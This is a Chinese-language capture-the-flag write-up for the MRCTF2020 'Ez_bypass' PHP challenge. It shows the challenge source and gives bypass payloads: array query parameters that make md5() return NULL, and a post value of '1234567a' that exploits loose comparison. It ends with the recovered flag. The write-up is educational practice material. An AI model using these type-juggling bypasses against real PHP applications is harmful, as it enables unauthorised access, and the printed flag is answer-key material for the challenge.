web:[MRCTF2020]Ez_bypass
打开链接是php代码,大概看一下
I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if(isset($_POST['passwd'])) { $passwd=$_POST['passwd']; if (!is_numeric($passwd)) { if($passwd==1234567) { echo 'Good Job!'; highlight_file('flag.php'); die('By Retr_0'); } else { echo "can you think twice??"; } } else{ echo 'You can not get it !'; } } else{ die('only one way to get the flag'); } } else { echo "You are not a real hacker!"; } } else{ die('Please input first'); } }Please input first
第一层:
(md5($id) === md5($gg) && $id !== $gg)=true
这里需要注意是强类型比较,可以利用数组绕过,因为md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。
?id[]=a&gg[]=b第二层:
(!is_numeric($passwd) && $passwd==1234567)=true
这里是一个弱类型比较,简单加一个字母,post提交即可
passwd=1234567a
得到falg:
flag{e04f4d7a-24c5-44f0-b4f1-621356bf1366}